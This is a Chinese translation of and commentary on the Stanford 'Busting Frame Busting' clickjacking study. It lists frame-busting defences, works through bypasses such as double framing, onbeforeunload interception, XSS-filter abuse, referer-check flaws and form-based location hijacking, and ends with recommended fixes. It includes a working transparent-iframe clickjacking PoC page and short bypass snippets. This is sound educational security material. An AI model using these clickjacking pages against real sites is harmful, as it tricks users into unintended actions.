Busting Frame Busting: a Study of Clickjacking Vulnerabilities on Popular Sites
Busting Frame Busting
Reference From: http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Translated By: LittleHann
1. 摘要
基于Web Frame的攻击例如: ClickJacking,一般使用iframes去劫持用户的web session。目前最普遍的防御手段被称之为frame busting,即阻止当页面加载一个frame的时候对当前页面产生影响。
2. 介绍
Frame busting依靠防御代码来防止页面加载一个嵌套的frame,它是防御ClickJacking的主要手段。Frame busting同时还被用在保护login登录页面上,如果没有frame busting,那个这个login登录页面能够在任何的嵌套的子frame中打开。一些新型的高级ClickJacking技术使用Drag-and-Drop去提取敏感隐私数据并且注入到另一个frame中,完成数据窃取。
上图演示了一个ClickJacking。原始的页面被一个透明的的frame(内容是在的,只是视觉上是透明的)覆盖在了原本的页面图层的上面。当用户和原始的页面进行交互的时候(例如点击),他们在不知情的情况下和恶意的frame页面进行了交互,达到了欺骗劫持的目的。
为了对抗这种ClickJacking攻击,业界普通采用这种做法: frame busting bode
if(top.location != location)
{
top.location = self.location;
}
frame busting code一般由一个条件表达式和纠正动作(即跳转)组成。即将顶层页面导航值当前页面。
我们的调查显示:
大多数的网站还仅仅是做了简单的代码防御,即把top.location(覆盖在原始页面上的"恶意"frame重定向回sefl.location("正确"的frame))。针对ClickJacking的防御并没有得到重视。
3. ClickJacking的常规防御方法
frame busting 的条件判断语句:
if (top != self) if (top.location != self.location) if (top.location != location) if (parent.frames.length > 0) if (window != top) if (window.top !== window.self) if (window.self != window.top) if (parent && parent != window) if (parent && parent.frames && parent.frames.length>0) if((self.parent&&!(self.parent===self))&&(self.parent.frames.length!=0))
frame busting 的纠正动作代码:
top.location = self.location
top.location.href = document.location.href
top.location.href = self.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write('')
top.location = location
top.location.replace(document.location)
top.location.replace('URL')
top.location.href = document.location
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
top.location.href = self.location
top.location = window.location
top.location.replace(window.location.pathname)
window.top.location = window.self.location
setTimeout(function(){document.body.innerHTML='';},1);
window.self.onload = function(evt){document.body.innerHTML='';}
var url = window.location.href; top.location.replace(url)
对于这种防御方法,我的理解是这样的:
这是一个对于frame覆盖的poc演示:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
<title>Click Jack!</title>
<style type="text/css">
iframe
{
width: 900px;
height: 250px;
/* Use absolute positioning to line up update button with fake button */
position: absolute;
top: -195px;
left: -740px;
z-index: 2;
/* Hide from view */
-moz-opacity: 0.5;
opacity: 0.5;
filter: alpha(opacity=0.5);
}
button
{
position: absolute;
top: 10px;
left: 10px;
z-index: 1;
width: 120px;
}
</style>
</head>
<body>
<iframe src="http://www.baidu.com" scrolling="no"></iframe>
<button>Click Here!</button>
</body>
</html>
注意这个<iframe src="http://www.baidu.com" scrolling="no"></iframe>其实是在当前BOM(http://www.dreamdu.com/javascript/what_is_bom/)中插入了一个新的窗体window,而在一个
BOM中,各个window之间的地位是平级的,区分它们的视觉参数只有z-index。当两个window产生覆盖时,这两个window之间就有了top和parent的父子关系,即frame覆盖的问题。
攻击者通过控制iframe的长、宽以及调整top、left的位置,可以把iframe页面内的任意部分覆盖到任何地方。
同时设置iframe的position为absolute,并将z-index的值设置为最大,以达到让iframe处于页面的最上层。最后,通过设置opacity来控制iframe页面的透明度,值0是完全不可见。
这样,就完成了一次点击劫持攻击。
3. ClickJacking的绕过方法
3.1 Double Frame 双框架嵌套绕过法
之前介绍的普通的ClickJacking防御代码中只是简单的对parent.location进行赋值来进行frame覆盖的纠正。
这在当前页面只被攻击者覆盖了一个frame的情况能起到很好的防御作用。然后,如果攻击者在当前页面上覆盖了两个的frame(Double Frame),情况就不一样了。
建立两个页面:
1.html代码为:
<iframe src="2.html">
2.html代码为:
<iframe src="http://www.victim.com">
访问1.html之后可以看到页面并无跳转等动作。
3.2 onBeforeUnload函数的利用
我对这个函数的理解是,我们可以把它看成是一个DOM的生命周期函数,它在一个页面将要被关闭时调用。而这个所谓的页面"关闭"包括刷新和URL的跳转。这个“生命周期”函数可以为我们用来对抗frame busting的防御代码。即传统的frame busting的原理就是检测当前的top.location是否和self.location是否一致,如果不一致就进行URL的跳转,而这个跳转可以被攻击者通过onBeforeUnload注册的回调函数拦截下来,进行相应的处理。
如下的防御代码:
if(top != self) top.location.replace(location);
新建立页面,代码如下:
<script> var framekiller = true; window.onbeforeunload = function()
{
if(framekiller)
{
return "Write something here to keep people stay!";
}
}; </script> <iframe src="http://www.victim.com/">
打开页面显示如下:
欺骗用户点击留在此页后显示:
3.3 针对XSS Filter的攻击和利用
IE8和Google Chrome引入了一个XSS Filter机制来防止页面中出现典型的XSS 攻击。但是,反过来,XSS Filter也可能被用来对抗frame busting的代码。
防御代码如下:
if(top!=self)
{ top.location=self.location; }
新建立页面,代码如下:
<iframe src="http://www.victim.com/?<script>">
访问后页面显示:
IE的xss筛选器自动拦截了跳转。可以看到,原本的frame busting防御代码的跳转被IE XSS Filter当成了恶意跳转给拦了下来。这突然让我想到了一个原则:
"所有的安全漏洞都来自于原本正常的功能。关键是我们对这个功能的理解深刻程度以及利用方式"
3.4 Referer检查的问题
有一些站点允许自己的域名嵌套自己,禁止外站对自己的嵌套。
通常是用document.referer来检测来源是否为自己的域名。
if(top.location!=location){
if(document.referrer && document.referrer.indexOf("aaa.com")==1)
{
top.location.replace(document.location.href);
}
}
判断字符串中是否含有本域名是常见的错误用法,利用二级域名的方式便可绕过,如:
http://aaa.com.bbb.com
注:从https域下post数据到http域的时候,浏览器不带Referer。
3.5 location劫持
在IE浏览器中,如果能够在防御代码的前面可以插入form表单的话,可以利用form表单对location进行劫持。
<form name=self location="javascript:alert(1)"></form> <script> if(top!=self)
{ top.location=self.location } </script>
用iframe嵌套此代码,可以看到没有跳转,执行了alert(1)。
4. 推荐防御的方法
4.1 X-FRAME-OPTIONS
X-FRAME-OPTIONS是微软提出的一个http头,专门用来防御利用iframe嵌套的点击劫持攻击。
并且在IE8、Firefox3.6、Chrome4以上的版本均能很好的支持。
这个头有三个值:
DENY // 拒绝任何域加载 SAMEORIGIN // 允许同源域下加载 ALLOW-FROM // 可以定义允许frame加载的页面地址
php中设置示例:
header ( "X-FRAME-OPTIONS:DENY");
4.2 目前最好的js的防御方案为
<head>
<style> body { display : none;} </style>
</head>
<body>
<script>
if (self == top)
{
var theBody = document.getElementsByTagName('body')[0];
theBody.style.display = "block";
}
else
{
top.location = self.location;
}
</script>
